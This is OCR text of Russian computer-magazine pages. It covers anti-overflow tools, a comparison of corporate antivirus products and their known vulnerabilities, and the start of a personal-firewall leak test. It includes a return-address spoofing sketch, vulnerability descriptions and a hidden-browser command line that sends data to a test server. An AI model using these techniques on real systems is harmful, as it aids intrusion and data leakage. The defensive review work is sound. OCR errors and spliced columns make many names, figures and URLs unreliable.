рес конструкции: 


call [неважно что]/тр [неважно что] 

fake_addr: <-этот адрес мы пооставляем как адрес возврата! 
здесь какой-то код, который не будет мешать нам по- 
Лучить результат 

ret. <-а здесь в стеке должен оказаться наш реальный 
адрес возврата! 


StackDefender в своей обычной мо- 
дификации (есть еще Server Edition) 
также базируется на защите на осно- 
ве неисполняемых стека и кучи для 
базовых сервисов операционной сис- 
темы и на перехвате вызовов функ- 
ций для всех приложений (в том чис- 
ле для сервисов). Кроме того, прог- 
рамма изменяет базовый адрес для 
модуля kernel32.dll, HO не рандомизи- 
рует эту базу при каждой перезагруз- 
ке, то есть при каждой перезагрузке 
она хоть и смещена относительно 
стандартной, но не меняется при этом. 

Все эти программы в случае обнару- 
жения атаки завершают весь процесс 
целиком, и для защиты, например, 
web- и Нр-серверов они непригодны. 

DefencePlus базируется также на 
технологии неисполняемости стека и 
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Softsphere.com - качаем и наслаждаемся разными версиями DefencePlus 
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StackDefender в процессе работы 


кучи, но эта технология уникальна 
тем, что практически не приводит к 
падению производительности защи- 
щаемой системы, поэтому защищают- 
ся все процессы в системе. 

Для совместимости с программами, 
выполняющими свой код в куче или 
стеке (а их немало), у программы есть 
четыре уровня защиты, которые поз- 
воляют добиться максимальной сов- 
местимости с уже написанным ПО. По 
умолчанию все процессы защищают- 
ся так, что стек неисполняем, а куча 
исполняема. В этом случае защита ку- 
чи базируется на контроле точек пе- 
ревода управления на эксплойт в ку- 
че. Дело в том, что этих точек немно- 
го: ячейка памяти с адресом 
UnhandledExceptionFilter, ячейки па- 
мяти в ТЕВ (системная база данных 
потока) с адресами функций 
RtlAcquirePebLock/RtlReleasePebLock и 
SEH. Если контролировать целостность 
критически важных ячеек памяти и 
SEH, то можно добиться хорошего 
уровня защиты кучи, сохранив ее ис- 
полняемость. Кроме неисполняемости, 
контроля целостности SEH и точек пе- 
ревода управления, программа случай- 


ным образом перемешивает данные в 
куче и стеке для предотвращения уга- 
дывания адресов, где лежат шелл-ко- 
ды, случайным образом перемещает 
базовые библиотеки при каждой пере- 
загрузке, чем чрезвычайно затрудняет 
"return-into-libc"-ataky (попробуй gora- 
дайся, куда программа забросила базу 
kernel32.ddl в этот раз!). В случае атаки 
завершается не все приложение, а 
только атакованный поток, что делает 
ее пригодной для защиты web- и ftp- 
серверов. Единственная проблема 
программы - это совместимость с KAV 
nog Windows 2000. 


ЧТО ДЕЛАТЬ, ЕСЛИ МЕНЯ 
УСПЕШНО АТАКОВАЛИ? 

и Прежде всего - не впадать в пани- 
ку. Команда "format с:" - это крайняя 
мера. Во-первых, нужно установить 
все последние заплатки от произво- 
дителя ОС. Во-вторых, желательно 
помнить, что шелл-код, если он не- 
большой, не способен серьезно пов- 
редить систему. Ему необходимо вы- 
качать из Сети дополнительные ком- 
поненты. Сделать это он может или с 
помощью tftp (простой Ир-модуль, 


входящий в стандарт поставки опера- 
ционной системы), или с помощью 
Internet Explorer. И тут мы способны 
перехватить и заблокировать эти 
действия с помощью файрвола. Во- 
обще хороший файрвол как утилита 
защиты после взлома незаменим, и 
именно поэтому грамотно спроекти- 
рованный шелл-код будет любыми 
способами противодействовать 
файрволу - от попыток обмануть его 
и выкачать свои компоненты тихо и 
незаметно до попыток выгрузить 
файрвол и отключить защиту. 

Если же шелл-код достаточно велик, 
чтобы самостоятельно создать испол- 
няемый модуль на диске, то у жертвы 
атаки море планов действий - от уста- 
новки этого модуля как реверсивного 
трояна GO попыток установить руткит. 
Если антивирус, установленный на 
компьютере, не будет иметь этот мо- 
дуль в своей антивирусной базе, он 
пропустит его. В этом случае понадо- 
бятся утилиты типа AVZ (неплохой ан- 
тируткит, построение списка загружа- 
емых модулей - '/.2-0160.50т), HijackThis 
(построение списка загружаемых мо- 
дулей - и lomeayote.org/i). Люди, которые 
не в состоянии самостоятельно спра- 
виться с логами этих программ, могут 
обратиться на неплохой русскоязыч- 
ный ресурс мили Гоп: запостить ло- 
ги и при этом вполне рассчитывать на 
бескорыстную помощь. 

Что же делать, если ничего не по- 
могло? Полностью переустановить 
операционную систему, поставить на 
нее файрвол, антивирус и защиту от 
атак на переполнение буфера, выка- 
чать и установить все заплатки. 

Сегодня атаки из массовых превра- 
щаются в акцентированные и целе- 
направленные, а хакерская вольни- 
ца постепенно перевоплощается в 
многомиллионный бизнес, в котором 
зомбируют тысячи компьютеров и 
крадут номера кредиток миллиона- 
ми. В таком мире безопасности ни- 
когда не бывает слишком много. Не- 
достаточно - бывает, много - нет. По- 
этому я призываю всех набираться 
опыта и знаний, в том числе в облас- 
ти компьютерной безопасности. Без 
этого будет очень тяжело противос- 
тоять коммерциализующейся армии 


взломщиков. 
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Андрей Семенюченко (Semu@rbecmail.ru) 


ВСЯ ПРАВДА 
ОБ АНТИВИРУСАХ 


ВСЯ ПРАВДА ОБ АНТИВИРУСАХ ) 


ОБЗОР И АНАЛИЗ САМЫХ ПОПУЛЯРНЫХ АНТИВИРУСОВ 


С 


овременный 1Т-рынок предлагает огромный ассортимент защитного программного обеспечения. Как разобраться во 
всем разнообразии антивирусов, одновременно не утонув в море информации? Чей антивирус лучше? Всегда ли 
производители говорят правду о своих продуктах? Существуют ли слабые места у этого вида ПО? На эти и многие 
другие вопросы постараюсь осветить в этой статье. 


ОРГАНИЗАЦИЯ 


И ТЕХНОЛОГИЯ 


ЗАЩИТЫ 


ИНФОРМАЦИИ 


и Построение защи- 
щенной компьютерной системы - это 
целая наука, и полностью охватить ее 
вряд ли возможно в рамках одной 
статьи. Для этого следовало бы рас- 
смотреть целый комплекс организаци- 
онных, правовых, экономических, ин- 
женерно-технических, программно-ап- 
паратных методов и средств защиты 
компьютерной обработки информа- 
ции. Даю установку - рассмотреть 
лишь часть средств защиты, а именно 
антивирусные программы. 

На самом деле информационная бе- 
зопасность - это защита информации 
и защита от информации. Действи- 
тельно, почти все организации, имею- 
щие доступ к небезопасным соедине- 
ниям, применяют межсетевые экраны 
и антивирусы, которые прекрасно со- 
четаются между собой. Задача файр- 
волов - фильтровать входящий и ис- 
ходящий трасрик для защиты системы 
на уровне протоколов и приложений. 
Задача антивирусного ПО - анализи- 
ровать входящие/исходящие данные. 
Другими словами, система защиты 


строится на блокировке неиспользуе- 
мых и потенциально опасных прото- 
колов и приложений межсетевым эк- 
раном, а вся оставшаяся разрешен- 
ная входящая/исходящая инсфформа- 
ция фильтруется антивирусом. 


ПЕРЕЧЕНЬ ПРОДУКТОВ 

и На российском рынке представле- 
но около десятка межсетевых экра- 
нов. С антивирусами дело обстоит го- 
раздо сложнее, поскольку каждый 
бренд представляет более десяти- 
двадцати наименований продуктов. 
Так, самый популярный российский 
антивирус, Антивирус Касперского, 
имеет в своем арсенале более пяти 
наименований продуктов в категории 


Антивирус Касперского 
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Защита от настоящих и буду! угроз 


"Для домашних пользователей" и бо- 
лее пятнадцати - класса "Для корпо- 
ративных клиентов". Разумеется, при- 
вести, описать и сравнить все прило- 
жения просто невозможно. Поэтому 
более эфорективным методом являет- 
ся сравнение антивирусных программ, 
входящих в состав корпоративных па- 
кетов, - сопоставление возможностей 
и услуг, предоставляемых каждой 
компанией-производителем. Так бу- 
дет даже интереснее. Больше досто- 
инств - больше недостатков! На наш 
суд представлены следующие антиви- 
русы: Kaspersky Business Optimal, 


Сайт AV-Test GmbH 


Dr.Web Enterprise Suite, McAfee Active 
Virus Defense, Symantec AntiVirus 
Enterprise Edition, Trend NeatSuite 
Standard Edition, Eset Nod32 Enterprise 
Edition. 


БАТАЛИИ АНТИВИРУСОВ 

С чего же начать? Для технически 
подкованной аудитории вполне go- 
пустимо опустить сравнение пользо- 


вательских интерфейсов. Уровень 
usability любого коммерческого анти- 
вируса уже давно достиг если не со- 
вершенства, то, по крайней мере, при- 
емлемой отметки. А это, в конце кон- 
LOB, зависит от вкуса и предпочтений 
конечного потребителя! 

В описании представленных продук- 
тов нам помогут самые авторитетные 


Test GmbH ( ), Virus Bulletin 
( ) u AV-comparatives ( 

). Они всегда готовы Npeg- 
ложить результаты последних срав- 
нительных тестов антивирусов той 
или иной категории. Указанные порта- 
лы постоянно обновляются группами 
всемирно известных антивирусных 
экспертов, информацию о которых 


из независимых онлайн-изданий: AV- 


Kaspersky Business Optimal 


Dr. Web Enterprise Suite 


Включает защиту для 


Windows [9x, МЕ, NT4, 2000 Professional, XP, T4 Server, 
2000 Advanced Server, 2003 Server], Linux/Unix [for File 
Server, Mail Server, Samba Server, [сар Server], NetWare, 
Exchange, Domino, MS ISA Server, Linux for Arm platform, 
Mobile devices under Symbian OS 


Windows [9x, Me, NT4, 2000, XP], Linux/ 
UNIX [File server, Mail server, Samba 
server, Icap server], NetWare, 
Communigate Pro for Windows plugin 


Размер антивируса 


17.46MB (KAV Workstation 5.0) 


9.95MB (Dr. Web for Windows) 


Частота обновления Ежечасно Ежечасно (днем - 2 раза в час) 
Размер обновлений Примерно 45КВ Примерно 10KB 

Скорость сканирования 2,298.4KB/s 2,196.5KB/s 

Сканирование архивов ДА ДА 

Чистка в архивах ДА 

Удаленное администрирование ДА ДА 

Удаленное управление ДА ДА 

Управление отчетами ДА ДА 


Техническая поддержка 


ДА, бесплатно 


ДА, Бесплатно 


Реакция на новые угрозы 


Менее 3 часов 


Менее 6 часов 


Бесплатная отдельная утилита сканирования 


ДА 


ДА 


Детектирование spyware и т.д. 


ДА 


ДА (в стадии бета-тестирования) 


Symantec AntiVirus Enterprise Edition 


McAfee Active Virus Defense 


Включает защиту для 


Windows [98, NT4, ME, 2000 Professional, XP 
Home/Professional, NT4 Server, 2000/2003 Server, Small 
Business Server, Terminal Services], Macintosh, NetWare, 
Exchange, Domino, Internet gateways [SMTP, FTP & HTTP] 
Windows [98, NT4, ME, 2000 Professional, XP 
Home/Professional, NT4 Server, 2000/2003 Server, Small 
Business Server, Terminal Services] 


Windows [NT4, 2000 Professional, XP, 
NT4 Server, 2000 Advanced Server, 
2003 Server], Linux, UNIX, NetWare, 
Exchange, Domino, Windows SMTP gate- 
ways 


Размер антивируса 


8.18MB (McAfee VirusScan Enterprise 8.01) 


Частота обновления Еженедельно Ежедневно 

Размер обновлений Примерно 150КВ 

Скорость сканирования 2,278.9KB/c 3,275KB/c 

Сканирование архивов ДА ДА 

Чистка в архивах НЕТ Только ZIP [один уровень вложения] 
Удаленное администрирование ДА ДА 

Удаленное управление ДА ДА 

Управление отчетами ДА ДА 


Техническая поддержка 


ДА, бесплатно 


ДА, дополнительная оплата 


Реакция на новые угрозы 


Мнее 14 часов 


Менее 13 часов 


Бесплатная отдельная утилита сканирования | ДА ДА 
Детектирование spyware и T.g. [ЕТ ДА 
Eset №0032 Trend NeatSuite Standard Edition 


Включает защиту для 


DOS, Windows [9x, NT4, МЕ, 2000/2003/XP], Linux, UNIX, 
NetWare, MS DOS, Lotus Domino, MS Exchange, Kerio Mail, 
Server, Kerio WinRoute Firewall 


Windows [9x, NT4, ME, 2000, 
Professional, XP Home/Professional, NT4 
Server, 2000 Server], Linux, NetWare 
NetApp Filer, EMC Celerra File Server, 
Exchange, Domino, Internet gateways, 
[SMTP, FTP, POP3 & HTTP] 


Размер антивируса 


8.19MB(Windows Trial version) 


97.21МВ (Trend OfficeScan Corporate 
Edition 6.5) 


Частота обновления 


Раз в несколько часов 


Размер обновлений Примерно 150КВ 
Скорость сканирования 3,106.7KB/c 

Сканирование архивов ДА ДА 

Чистка в архивах НЕТ НЕТ 

Удаленное администрирование ДА ДА 

Удаленное управление ДА ДА 

Управление отчетами ДА ДА 


Техническая поддержка 


ДА, беспл. только e-mail 


ДА, дополнительная оплата 


Реакция на новые угрозы 


Менее 7 часов 


Менее 9 часов 


Бесплатная отдельная утилита сканирования 


НЕТ 


ДА 


Детектирование spyware и т.д. 


ДА (в новой версии v2.5) 


| Таблица Nel. Предоставляемый антивирусами сервис 


ДА 


Обзор вирусной 
активности за 
текущий месяц 
можно найти на 
сайте 


www.viruslist.ru. 


Самым извест- 
ным примером 
сетевого червя 
был Lovesan, 
появившийся в 
августе 2003 
года и исполь- 
зовавший для 
своего распро- 
странения кри- 
тическую уяз- 
вимость в опе- 
рационной сис- 
теме Windows. 
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также можно найти по приведенным 
ссылкам. 


СЛЕДСТВИЕ ВЕДУТ ЗНАТОКИ 

Итак, начнем наше исследование 
с описания возможностей антивирус- 
ных программ. 

В таблице №1 - сравнение услуг, пре- 
доставляемых антивирусными компа- 
ниями. Если в ней пропущены некото- 
рые значения, значит, разработчик 
ПО не сказал исследовательским 
центрам ничего по поводу этих сег- 
ментов. 

Первое, что бросается в глаза (и 
что известно далеко не всем), - ог- 
ромное количество операционных 
систем, поддерживаемых большин- 
ством антивирусов, а также интегра- 
ция осей с различными приложения- 
ми. Обидно только, что компания 
Symantec совсем не уделяет внима- 
ния *пх-системам. 

Самым быстрым в плане сканирова- 
ния файлов оказался Dr.Web, за ним - 
Symantec Antivirus. Неплохие резуль- 
таты показали Антивирус Касперско- 
го и №932 Antivirus. Зато у Dr.Web и 
бутащес отсутствует детектирова- 
ние SpyWare, шпионского програм- 
много обеспечения, которое собирает 
информацию о компьютере и пользо- 
вателе. 


По частоте обновлений лидером яв- 
ляется Антивирус Касперского. Еже- 
часно! Это вполне объяснимо: "Лабо- 


McAfee VirusScan 


МНЕНИЕ ЭКСПЕРТА: АНТИВИРУСНЫЕ ТЕХНОЛОГИИ 


ЗАЙЦЕВ ОЛЕГ, АВТОР AVZ (HTTP://Z-OLEG.COM/SECUR) 
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| Trend Micro PC-cillin 


ратория Касперского" позиционирует 
себя как разработчика с самым высо- 
ким рейтингом детектирования Bpego- 
носных программ и мгновенной реак- 
цией на возникновение вирусных эпи- 
демий. A вот компании Symantec и 
McAfee, видимо, не считают нужным 


торопиться при вспышке новых виру- 
сов. Позор, господа, стыдитесь! 
Поскольку представленные антиви- 
русы являются корпоративными, все 
они имеют средства удаленного адми- 
нистрирования и управления. Одна из 
новомодных функций - возможность 


МНЕНИЕ ЭКСПЕРТА: АНТИВИРУСНЫЕ ТЕХНОЛОГИИ 


ЗАЙЦЕВ ОЛЕГ, АВТОР AVZ (HTTP://Z-OLEG.COM/SECUR) 


обнаружения вирусов в архивах. Та- 
кая способность имеется у всех 
представленных антивирусов, но уда- 
лять и лечить зараженные объекты 
способны далеко не все. С этой зада- 
чей справляются только Антивирус 
Касперского и McAfee Antivirus. Пос- 
ледний, правда, способен чистить иск- 
лючительно архивы типа Zip с одноу- 
ровневой глубиной вложения. 

Ключевым компонентом любого ан- 
тивирусного решения является техни- 
ческая поддержка, поскольку мы зна- 
ем, насколько часто возникают проб- 
лемы с антивирусным ПО. Как видно 
из таблицы, все компании предостав- 
ляют своим клиентам услуги техни- 
ческой поддержки, только Trend Micro 
и McAfee впаривают эту услугу за go- 
полнительную плату. 


ИЗ ЛИЧНОГО НАБЛЮДЕНИЯ 
Описав возможности антивиру- 
сов, окинем взором их недостатки! 


DR.WEB 

ш При обновлении часто возникает 
сообщение "Ошибка получения cpai- 
ла версий", хотя соединение с интер- 
нетом вполне работоспособно. 


ш При использовании Apache 
(Win32-nopT) некоторые скрипты пе- 
рестают корректно выполнять свою 
работу. Такое бывает при использова- 
нии Spider Guard от Dr.Web. 


MCAFEE 

и При установке McAfee Office Ha6- 
людается нестабильная работа, види- 
мо, из-за множественности одновре- 
менно запускаемых программ (по 
умолчанию пять). Сократив их количе- 
ство, можно добиться более-менее 
стабильной работы. 

m Сбои при запуске модуля отчетов 
Discover Pro. 

ш Компонент McAfee VirusScan's 
WebScanX подключается в 
explorer.exe. Когда Explorer исполь- 
зуется для просмотра каталогов и ос- 
новной каталог пользователя pacno- 
ложен на сетевом ресурсе, 
WebScanX вызывает несколько .dIl- 
файлов в основном каталоге пользо- 
вателя. Нападающий может внед- 
рить произвольный код в эти ай, ко- 
торый будет выполнен на системе 
пользователя с системными приви- 
легиями. 

ш При сканировании сформирован- 
ных особым образом архивов в фор- 


мате [НА в движке антивируса возни- 
кает ошибка переполнения буфера, 
после чего нападающий получает 
возможность выполнить на машине 
вредоносный код. 


ESET 

m Eset NOD32 He всегда может опре- 
делить точное название вируса, HO- 
мер его версии и т.д. 

и Вантивирусе Eset's NOD32 для 
UNIX-cucTeM существует ошибка, при- 
водящая к переполнению буфера. 
Локальный пользователь может по- 
лучить гоо-привилегии. 

Использовать уязвимость очень 
просто. Создаем имя пути длиннее 
500 символов. В результате уязви- 
мость позволяет перезаписать ЕАХ и 
ЕСХ регистр, после этого выполнить 
произвольный код с привилегиями 
сканирующего процесса (гоо{-пользо- 
ватель). Пример: 


ш Существуют редкие ложные сра- 
батывания. Но и одного такого случая 
достаточно, если в результате вместо 
вируса удален нужный файл. 


SYMANTEC 

и Редкие обновления большого раз- 
мера (обычно не менее 4 Мб). 

и При попытке просканировать на 
наличие вирусов с локальной маши- 
ны антивирус выдает ошибку Ох2. Og- 
нако при сканировании этого же 
компьютера через Symantec System 
Center Console все идет нормально. 

и Существует уязвимость в обра- 
ботке UPX сжатых файлов. Уязви- 
мость вызвана ошибкой в модуле ан- 
тивируса DEC2EXE. 

Кстати, не стоит искать уязвимости 
продуктов Symantec на сайте 

. Данный портал был куплен ком- 
панией Symantec в прошлом году :). 

m Symantec обнаруживает многие 
вирусы, но нормально убить их, не то 
что лечить, ему вряд ли удастся. 

m MegneHHee всех выполняет пол- 
ное сканирование жесткого диска. 


АНТИВИРУС КАСПЕРСКОГО 

ш Не самый быстрый антивирус, HO, ви- 
димо, за качество приходится платить. 

и Существовала бага с обработ- 
кой 7!р-архивов. Суть в том, что для 
каждого находящегося в архиве 
объекта Zip хранит две копии заго- 
ловка (local/central directory), со- 
держащего, среди прочего, реаль- 
ный размер распакованного файла. 
Если злоумышленник в обоих заго- 
ловках укажет значение размера 
равным нулю, то антивирусный ска- 
нер ошибочно посчитает объект 
слишком маленьким для проверки и 


пропустит его (пофриксено после ог- у 


a 
© 
> 
x 
о 
8 
и 
> 
= 
|. 4 
> 
o 
li 
wn 


a 
о 
> 
Е - 
о 
6 
и 
> 
= 
|. 4 
> 
о 
ш 
п 


@7 клиент 


ВСЯ ПРАВДА ОБ АНТИВИРУСАХ р 


on ш г. 
ое 
= Lo 


Ha сайте www.viruslist.ru можно найти 
описание большинства вирусов! 


ласки, следует добавить ради спра- 
ведливости). 

m Неудачная четвертая версия, ее 
продукты отличаются непродуманным 
и совершенно недружелюбным для 
пользователя интерфейсом. 

и Антивирус Касперского все-таки 
удаляет многие вирусы, даже не пыта- 
ясь лечить их. 


TREND MICRO 

ш По умолчанию к папке установки 
Trend Micro Office Scan и соответству- 
ющему разделу реестра дается пол- 
ный доступ группе Еуегуопе. 

и Выпуск "сырых" (непроверенных) 
обновлений, приводящих к наруше- 
нию работы системы, проблемам дос- 
тупа к сетевым ресурсам и др. 

m Некорректная обработка софрорми- 
рованных особым образом архивов в 
срормате АК... Для реализации напа- 
дения злоумышленнику необходимо 
вставить в локальный заголовок ар- 
хива чрезмерно длинное имя файла. 
Если атака пройдет успешно, будет 
выполнен произвольный вредонос- 
ный код на удаленном компьютере. 

ш Когда Trend Micro PC-cillin Internet 
Security выдает предупреждения 
пользователю, она создает HMTL- 
файл в каталоге временных файлов 
на целевой системе и затем загружа- 
ет файл через Microsoft Internet 
Explorer. Удаленный пользователь 
может создать специально сформи- 
рованный Zip-apxuB и HTML, который 
заставит браузер целевого пользова- 
теля загрузить 7р-файл. Затем, когда 
программное обеспечение Тгепа Мсго 
сгенерирует предупреждение для zip- 
срайла (что он содержит некоторый 
злонамеренный код), будет выполнен 
произвольный код сценария, содер- 
жащийся в 7р-файле. 

m Слабая техническая поддержка, 
российская версия портала Тгепа 
Micro на английском языке. 


ВЫСОКИЕ ТЕХНОЛОГИИ 
На какие только ухищрения не 

идут злоумышленники при написании 
своих детищ, но антивирусные разра- 
ботчики тоже не сидят на месте и ис- 
пользуют различные методы детекти- 
рования. Вот основные: 

©. Использование сигнатур и конт- 
рольных сумм. Это самый распростра- 
ненный метод, основанный на сравне- 
нии имеющихся сигнатур с сигнатура- 
ми сканируемых файлов. 
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ИСПОЛЬЗОВАНИЕ РЕДУЦИРОВАННОЙ МАСКИ 


©. Эвристический анализатор. Эв- 
ристика (греч. heurisko - отыскиваю, 
открываю) - это наука, изучающая 
продуктивное творческое мышление 
и использующая специальные мето- 
ды с целью открытия нового. С по- 
мощью эвристики можно распознать 
вирусную программу по типу выпол- 
няемых действий. Иногда эвристичес- 
кий анализатор позволяет детектиро- 
вать целое семейство одного вируса 
по заданному алгоритму. 

Современные эвристические анали- 
заторы позволяют обнаруживать вре- 
доносные коды в исполняемых сфай- 
лах, секторах и памяти, а также новые 
скрипт-вирусы и вредоносные прог- 
раммы gna Microsoft Office (и других 
программ, использующих VBA) и, на- 
конец, вредоносный код, написанный 
на языках высокого уровня, таких как 
Microsoft Visual Basic. Гибкая архитек- 
тура и комбинация различных мето- 
дов позволяет добиться достаточно 
высокого уровня детектирования но- 
вых вредоносных программ. Высокая 
эорфективность эвристического ана- 


Тонкая настройка антивируса 


лизатора наблюдается при детектиро- 
вании эксплойтов. 

@. Эмуляция. При данном подходе 
создается виртуальная среда, в рам- 
ках которой эмулируется поведение 
подозреваемой программы. Позволяет 
распознавать полиморофные вирусы. 

Кроме того, многие компании имеют 
свои уникальные технологии, содей- 
ствующие эффективному использо- 
ванию антивируса. Так в антивирус- 
ном "движке" Антивируса Касперско- 
го реализован ряд технологий, кото- 
рые значительно ускоряют проверку 
объектов и при этом гарантируют сох- 
ранение высокого качества детекти- 
рования, а также улучшают детекти- 
рование и лечение вредоносного 
программного обеспечения в архив- 
ных файлах. 

Технология iChecker позволяет go- 
биться разумного баланса между на- 
дежностью защиты рабочих станций 
(особенно серверов) и использовани- 
ем системных ресурсов защищаемого 
компьютера. Благодаря этой техноло- 
гии значительно сокращается время 
загрузки (go 30-40%) операционной 
системы (по сравнению с традицион- 
ными антивирусными решениями) и 
время запуска приложений при актив- 
ной антивирусной защите. При этом 
гарантируется, что все файлы на дис- 
ках компьютера были проверены и не 
инфицированы. Основная идея дан- 
ной технологии - не проверять то, что 
не изменялось и уже было проверено. 
Антивирусный "движок" ведет специ- 
альную базу данных, в которой хра- 
нятся контрольные суммы всех прове- 
ренных (и неинфицированных) сфай- 
лов. Теперь, прежде чем отдать файл 
на проверку, "движок" подсчитывает 
и сравнивает контрольную сумму 
файла с данными, хранящимися в ба- 
зе данных. Если данные совпадают, 


ИСПОЛЬЗОВАНИЕ РЕДУЦИРОВАННОЙ МАСКИ 


Ш Примеров широко известных "защищенных" операционных сис- 
тем и приложений, к сожалению, нет. Частично удовлетворяет тре- 
бованию "защищенности" /ауа-машина, которая запускает Java- 
приложение в режиме "песочницы". И действительно, "настоящих" 
вирусов и троянских программ в виде ауа-приложений не было 
достаточно долго (за исключением тестовых вирусов, которые 
практически неработоспособны). Вредоносные программы в виде 
Уауа-приложений появились лишь тогда, когда были обнаружены 
способы обхода встроенной в /ауа-машину системы безопасности. 
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Награда VB 100% na сайте Virus Bulletin 


значит, файл был проверен и повтор- 
ная проверка не требуется. Стоит за- 
метить, что время, затрачиваемое на 
подсчет контрольных сумм файла, 
значительно меньше, чем время анти- 
вирусной проверки. 

iStreams - это технология, близкая 
по смыслу iChecker, которая позволя- 
ет исключить проверку файлов, рас- 
положенных на диске с файловой 
системой NTFS, не измененных со 
времени последней проверки. Для ее 
реализации используется технология 
хранения контрольных сумм файлов 
в дополнительных потоках NTFS. 

iCure - технология лечения инфици- 
рованных файлов в архивах. Благода- 
ря этой технологии инфицированные 
объекты внутри архивных файлов бу- 
дут успешно вылечены (или удалены, 
в зависимости от настроек антивиру- 
са) без помощи внешних утилит архи- 
вации. На сегодняшний день поддер- 
живаются следующие типы архивов: 
ARJ, CAB, RAR, ZIP. Благодаря мо- 
дульной архитектуре и технологии го- 
рячего обновления KeepUp2Date 
пользователь сможет легко обнов- 
лять и расширять список поддержи- 
ваемых типов архиваторов без пере- 
загрузки антивируса. 

iArc - еще одна технология работы с 
архивными срайлами. Эта технология 
улучшает поддержку многотомных ар- 
хивов, которая была реализована в 
предыдущих версиях антивирусного 
"движка" Антивируса Касперского. iArc 
позволяет проверять многотомные ар- 


хивы. Теперь Kaspersky Anti-Virus в 
состоянии обнаружить вирус даже ес- 
ли он будет упакован в многотомный 
архив, который, в свою очередь, также 
будет упакован в многотомный архив. 


НАГРАДА ЗА ОТВАГУ 

и Ежемесячный журнал Virus 
Bulletin, издающийся в Великобри- 
тании, в январе 1998 года учредил 
награду VB 100%. Это одна из са- 
мых престижных наград. VB 100% 
присуждается антивирусным про- 
дуктам, обнаруживающим все In- 
The-Wild вирусы - "живые" вирусы, 
встречающиеся в реальной жизни и 
актуальные на данный момент, как в 
режиме сканирования по требова- 
нию, так и в режиме проверки в ре- 
альном времени (с помощью анти- 
вирусного монитора). Награда не 
присуждается в случае ложных сра- 
батываний при сканировании "чис- 
тых" файлов. 


В следующей таблице приведены 
результаты последних присуждений 
VB 100% по итогам обнаружения ви- 
русов в разных операционных систе- 
мах. Результаты также доступны на 
сайте Virus Bulletin (wwwvrusdin.com) gna 
любого зарегистрированного поль- 
зователя. 

Как показывает таблица, пол- 
ностью со своей задачей справились 
только два антивируса: отечествен- 
ный продукт Антивирус Касперского 
и Eset Nod32. Computer Associates и 
Trend Micro делят между собой пер- 
вые места с обратного конца. Анти- 
вирус Trend Micro вообще в послед- 
нее время показывает себя на миро- 
вой арене не с лучшей стороны. Сра- 
зу вспоминается неприятная исто- 
рия, произошедшая в Японии. Дело 
в том, что антивирусы Trend Micro 
стоят на защите в японской желез- 
нодорожной компании East Japan 
Railway Со. 24 апреля этого года га- 
зета Japan Times сообщила, что ком- 
пания Trend Micro выпустила обнов- 
ление, в котором содержался файл с 
грубой ошибкой. В результате на 
многих компьютерах железнодорож- 
ной компании, а также в некоторых 
других пострадавших организациях 
довольно продолжительное время 
происходили сбои в работе системы, 
а сетевые ресурсы вообще были не- 
доступны. Конечно, позже ошибка 
была исправлена, но все-таки это не 
образец для работы одного из лиде- 
ров антивирусной индустрии. 


ВМЕСТО ЗАКЛЮЧЕНИЯ 

m= Безусловно, можно было бы 
долго подводить итоги о том, какой 
антивирус лучше. Но в моей статье 
не место субъективности, поэтому 
пусть факты и цифры от авторитет- 
ных источников говорят за себя са- 
ми. Были рассмотрены различные 
категории сравнения продуктов. Хо- 
тя, возможно, при покупке программ 
нам придется руководствоваться и 
другими принципами, принимая во 
внимание государственную серти- 
фикацию или цену дополнительной 
технической поддержки. Тем не ме- 
нее, сочетая информацию из этой 
статьи со своими собственными 
идеями, можно значительно повы- 
сить эфорективность построения 
системы защиты. 
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ПРОВЕРИМ, КТО ЖЕ ХУЖЕ ВСЕХ 


добьемся своей цели. 


этой статье не будет сравнения интерфейсов, хвалебных песен и прочих розовых слюней. Мы просто возьмем 
самые популярные файрволы и будем жестоко и всесторонне пробивать их. Всеми доступными методами. И мы 


Сегодня на суд общест- 


венности предстанут 


три продукта security- 


индустрии: ZoneAlarm 
Internet Security Suite 
5.5.094, Kerio Personal Firewall 4.1.1 и 
OutPost Firewall Pro 2.7. Все они явля- 
ются персональными сфайрволами и 
представляют собой целый набор раз- 
нообразных средств. Обязательными 
в них являются сфрункции защиты 
компьютера от внешних и внутренних 
угроз, и сейчас мы узнаем, насколько 
качественно они реализованы. 

Тест будет состоять из двух основ- 
ных этапов: первый - это тест на ус- 
тойчивость "изнутри", то есть на спо- 
собность продукта контролировать 
активность приложений на локальном 
компьютере, а второй - на устойчи- 
вость "снаружи". На мой взгляд, пер- 
вая часть гораздо важнее, так как 
вторая в большей степени зависит от 
грамотного конфигурирования межсе- 
тевого экрана. Но проверка есть про- 
верка, и ее нужно проводить добросо- 
вестно. Итак, приступим к экзамену. 


А ЧТО ВНУТРИ??? 

и Чуть ли не главная задача персо- 
нальных файрволов - это контроль 
сетевой активности приложений. Бла- 
годаря этой сришке тучи троянцев и 
другой гадости не представляют для 
пользователей брандмауэров ника- 
кой опасности. Но темная сторона си- 
лы не дремлет :), и ее адепты приду- 
мывать разные хитрые приемы, чтобы 
получить доступ к интернету. Нача- 
лась настоящая война. 

Чтобы узнать, насколько файрвол 
готов к ней, мы воспользуемся нес- 
колькими утилитами, имитирующими 
работу всяческих вредоносных прог- 
рамм при помощи различных техноло- 
гий. Настройки сетевых экранов, свя- 
занные с "исходящей" защитой, были 
выставлены на максимум, дабы опи- 
сать полную картину их возможнос- 
тей. Также по умолчанию браузеру 
было разрешено обращаться в интер- 
нет, то есть при его первой попытке 
выхода в Сеть мы запоминали выбор 
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(или создавали правило, кому как 
больше нравится). 

Первым испытанием стала програм- 
мка по название Leak Test 
(http//grc.com/lt/leaktesthtm). Это простой тест 
на подстановку. Для проверки нужно 
просто переименовать эту програм- 
мульку в приложение, которому дове- 
ряет стена. Если ей удастся устано- 
вить соединение, то срайрвол - пол- 
ный лопух и не делает никаких прове- 
рок подлинности. Другими словами, 
троянец может запросто прикинуться 
браузером, просто назвав себя его 
именем. Все трое испытуемых удачно 
справились с этим коварным обман- 
щиком и распознали измену. 

Следующим шагом была утилита 
TooLeaky ((')'//‘a0leaky.zenso/.com), которая 
относится к типу launcher. Программа 
запускает IE следующей командной 
строкой: iexplore.exe 
http://gre.com/It/leaktest.htm?PersonallnfoGoesHere. Окно 
осла скрыто, и пользователь его не 
видит. Если TooLeaky удалось удачно 
загрузить бродилку и ей разрешен 
доступ к 80-му порту (что почти всег- 
ga и бывает), то на сервер GRC.com 
посылается специальное сообщение. 
Если бы это был троянец, то он явно 
воспользовался бы этим по-другому. 
Задача файрвола в этом тесте - не go- 
пустить запуска IE. И это испытание 
прошли все: сразу же засветилось 
окошко, гласящее, что ТооЁеаку пыта- 
ется запустить Internet Explorer. 

Теперь усложним задание. Для это- 
